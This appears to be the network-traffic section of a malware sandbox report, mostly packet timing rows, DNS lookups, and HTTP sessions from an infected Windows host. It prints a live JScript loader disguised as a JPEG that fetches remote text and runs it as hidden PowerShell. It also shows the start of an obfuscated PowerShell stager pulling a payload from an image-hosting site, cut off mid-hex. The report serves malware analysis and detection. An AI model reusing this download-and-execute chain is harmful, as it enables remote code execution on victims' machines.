                  Jul 2, 2024 08:22:17.890994072 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.891067028 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.891211987 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.891222954 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.891233921 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.891249895 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.891249895 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.891551971 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.891562939 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.891573906 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.891885996 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892071009 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.892074108 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892086029 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892230034 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892400026 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892410994 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892421007 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892431021 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892436981 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.892436981 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.892515898 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.892570019 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892581940 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892591953 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892602921 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892628908 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.892628908 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.892698050 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.892709970 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893363953 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893376112 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893385887 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893418074 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.893418074 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.893481970 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893491030 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893577099 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.893613100 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893625021 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893745899 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893755913 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893767118 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.893789053 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.893789053 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.894294024 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.894304991 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.894315004 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.894433022 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.894443989 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.894459963 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.894470930 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.894481897 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.894481897 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.894764900 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.894829035 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.896460056 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.896601915 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.896614075 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.896925926 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.897939920 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.897949934 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.898108959 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.898121119 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.898154020 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.898258924 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.903450966 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.903465033 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.903477907 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.903486967 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.903506041 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.903551102 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.908096075 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.908118963 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.908128977 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.908154964 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.908190966 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.908200026 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.908247948 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.926290989 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926305056 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926316977 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926330090 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926373005 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.926373005 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.926539898 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926553965 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926564932 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926575899 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926587105 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926599026 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.926604033 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.926630974 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.926630974 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.932323933 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.932336092 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.932347059 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.932378054 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.932557106 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.932569981 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.932607889 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.983592033 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983608961 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983618975 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983639002 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983645916 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.983645916 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.983649015 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983659983 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983670950 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983871937 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983881950 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983892918 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983902931 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983907938 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.983907938 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.983912945 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983923912 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.983942032 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.984131098 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984141111 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984150887 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984167099 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.984167099 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.984224081 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984235048 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984245062 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984255075 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984268904 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984280109 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984286070 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.984286070 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.984291077 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984499931 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.984663963 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984673977 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984683990 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984694004 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984723091 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.984723091 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.984772921 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984782934 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984792948 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984802961 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984812021 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984821081 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.984824896 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984834909 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.984846115 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.985292912 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.985368013 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985382080 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985392094 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985402107 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985413074 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985423088 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985431910 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985438108 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.985438108 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.985443115 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985452890 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985461950 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985472918 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985476971 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.985476971 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.985482931 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.985966921 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.986028910 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986044884 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986054897 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986064911 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986073017 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.986073971 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986088991 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986088991 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.986099958 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986109018 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986119986 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986125946 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.986125946 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.986129999 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986140013 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986149073 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986159086 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986165047 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.986165047 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.986169100 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986180067 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986190081 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986200094 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.986205101 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.986205101 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.986210108 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987008095 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987024069 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987034082 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987044096 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987052917 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987054110 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987054110 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987062931 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987072945 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987081051 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987081051 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987082958 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987092972 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987102985 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987112999 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987123013 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987124920 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987124920 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987132072 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987142086 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987149954 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987152100 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987162113 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987171888 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987176895 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987176895 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987183094 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987193108 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987431049 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987554073 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987900019 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987910986 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987920046 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987920046 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987931013 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987941027 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987951040 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987956047 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987966061 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987977028 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.987977028 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:17.987977028 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:17.988298893 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:18.016041994 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.016061068 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.016077995 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.016088963 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.016098976 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.016110897 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.016122103 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.016134024 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:18.016134024 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:18.016165018 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:18.016206980 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.016230106 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.016311884 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:18.068072081 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.068234921 CEST8049167192.3.243.156192.168.2.22
                  Jul 2, 2024 08:22:18.069448948 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:18.212693930 CEST4916780192.168.2.22192.3.243.156
                  Jul 2, 2024 08:22:18.635420084 CEST4916880192.168.2.22208.95.112.1
                  Jul 2, 2024 08:22:18.640384912 CEST8049168208.95.112.1192.168.2.22
                  Jul 2, 2024 08:22:18.640639067 CEST4916880192.168.2.22208.95.112.1
                  Jul 2, 2024 08:22:18.641774893 CEST4916880192.168.2.22208.95.112.1
                  Jul 2, 2024 08:22:18.646634102 CEST8049168208.95.112.1192.168.2.22
                  Jul 2, 2024 08:22:18.936270952 CEST4916680192.168.2.22208.95.112.1
                  Jul 2, 2024 08:22:19.110130072 CEST8049168208.95.112.1192.168.2.22
                  Jul 2, 2024 08:22:19.309577942 CEST4916880192.168.2.22208.95.112.1
                  Jul 2, 2024 08:22:58.345248938 CEST8049168208.95.112.1192.168.2.22
                  Jul 2, 2024 08:22:58.345343113 CEST4916880192.168.2.22208.95.112.1
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 08:22:13.011703014 CEST5456253192.168.2.228.8.8.8
                  Jul 2, 2024 08:22:13.225989103 CEST53545628.8.8.8192.168.2.22
                  Jul 2, 2024 08:22:16.100753069 CEST5291753192.168.2.228.8.8.8
                  Jul 2, 2024 08:22:16.112360001 CEST53529178.8.8.8192.168.2.22
                  Jul 2, 2024 08:22:18.609288931 CEST6275153192.168.2.228.8.8.8
                  Jul 2, 2024 08:22:18.618108988 CEST53627518.8.8.8192.168.2.22
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 2, 2024 08:22:13.011703014 CEST192.168.2.228.8.8.80x15a2Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                  Jul 2, 2024 08:22:16.100753069 CEST192.168.2.228.8.8.80x38fcStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                  Jul 2, 2024 08:22:18.609288931 CEST192.168.2.228.8.8.80x3224Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 2, 2024 08:22:13.225989103 CEST8.8.8.8192.168.2.220x15a2No error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
                  Jul 2, 2024 08:22:13.225989103 CEST8.8.8.8192.168.2.220x15a2No error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
                  Jul 2, 2024 08:22:16.112360001 CEST8.8.8.8192.168.2.220x38fcNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  Jul 2, 2024 08:22:18.618108988 CEST8.8.8.8192.168.2.220x3224No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  • uploaddeimagens.com.br
                  • 192.3.243.156
                  • 41.216.183.13
                  • ip-api.com
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.2249161192.3.243.15680976C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 08:22:09.856952906 CEST321OUTGET /portugalslovenia.jpeg HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 192.3.243.156
                  Connection: Keep-Alive
                  Jul 2, 2024 08:22:10.441570997 CEST1229INHTTP/1.1 200 OK
                  Content-Type: image/jpeg
                  Last-Modified: Mon, 01 Jul 2024 17:13:25 GMT
                  Accept-Ranges: bytes
                  ETag: "d1fce4fbd9cbda1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Tue, 02 Jul 2024 06:22:10 GMT
                  Content-Length: 1002
                  Data Raw: ff fe 76 00 61 00 72 00 20 00 6e 00 75 00 62 00 6c 00 61 00 72 00 2c 00 20 00 70 00 61 00 63 00 68 00 6f 00 75 00 63 00 68 00 61 00 64 00 61 00 2c 00 20 00 63 00 6f 00 6e 00 73 00 74 00 69 00 74 00 75 00 63 00 69 00 6f 00 6e 00 61 00 6c 00 2c 00 20 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 3b 00 0d 00 0a 00 6e 00 75 00 62 00 6c 00 61 00 72 00 20 00 3d 00 20 00 6e 00 65 00 77 00 20 00 41 00 63 00 74 00 69 00 76 00 65 00 58 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 4d 00 53 00 58 00 4d 00 4c 00 32 00 2e 00 53 00 65 00 72 00 76 00 65 00 72 00 58 00 4d 00 4c 00 48 00 54 00 54 00 50 00 22 00 29 00 3b 00 0d 00 0a 00 6e 00 75 00 62 00 6c 00 61 00 72 00 2e 00 6f 00 70 00 65 00 6e 00 28 00 22 00 47 00 45 00 54 00 22 00 2c 00 20 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 34 00 31 00 2e 00 32 00 31 00 36 00 2e 00 31 00 38 00 33 00 2e 00 31 00 33 00 2f 00 55 00 73 00 65 00 72 00 73 00 5f 00 41 00 50 00 49 00 2f 00 42 00 72 00 61 00 69 00 6e 00 69 00 61 00 63 00 4d 00 41 00 58 00 2f 00 66 00 [TRUNCATED]
                  Data Ascii: var nublar, pachouchada, constitucional, command;nublar = new ActiveXObject("MSXML2.ServerXMLHTTP");nublar.open("GET", "http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txt", false);nublar.send();if (nublar.status === 200) { pachouchada = nublar.responseText; constitucional = new ActiveXObject("WScript.Shell"); cochila = "powershell -Command \"" + pachouchada + "\""; constitucional.Run(cochila, 0, true); constitucional = null;}nublar = null;


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.224916241.216.183.13802884C:\Windows\SysWOW64\wscript.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 08:22:11.011322021 CEST214OUTGET /Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txt HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: 41.216.183.13
                  Jul 2, 2024 08:22:11.705590010 CEST1236INHTTP/1.1 200 OK
                  Date: Tue, 02 Jul 2024 06:21:37 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Mon, 01 Jul 2024 17:12:43 GMT
                  ETag: "aab-61c32b4926bec"
                  Accept-Ranges: bytes
                  Content-Length: 2731
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Data Raw: ef bb bf 2e 28 20 24 70 53 48 6f 4d 65 5b 32 31 5d 2b 24 70 53 68 6f 6d 65 5b 33 34 5d 2b 27 78 27 29 20 28 20 28 27 74 30 76 6c 69 6e 6b 20 3d 20 41 6d 61 68 74 74 70 73 3a 2f 2f 75 70 6c 6f 61 64 64 65 27 2b 27 69 6d 61 67 65 6e 73 2e 63 6f 6d 2e 62 72 2f 69 6d 61 67 65 73 2f 30 30 34 2f 38 30 37 2f 30 35 33 2f 6f 72 69 67 69 6e 27 2b 27 61 6c 2f 6e 65 77 5f 69 6d 61 67 65 2e 6a 70 67 3f 31 37 31 39 38 34 36 32 33 35 41 6d 61 3b 20 74 30 76 77 65 62 43 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 3b 20 74 72 79 20 7b 20 74 30 76 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 3d 20 74 30 76 77 65 62 43 6c 69 65 6e 74 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 74 30 76 6c 69 6e 6b 29 20 7d 20 63 61 74 63 68 27 2b 27 20 7b 20 57 72 69 74 65 2d 48 6f 73 74 20 41 6d 61 46 61 69 6c 65 64 20 54 6f 20 64 6f 27 2b 27 77 6e 6c 6f 61 64 20 64 61 74 61 20 66 72 6f 6d 20 74 30 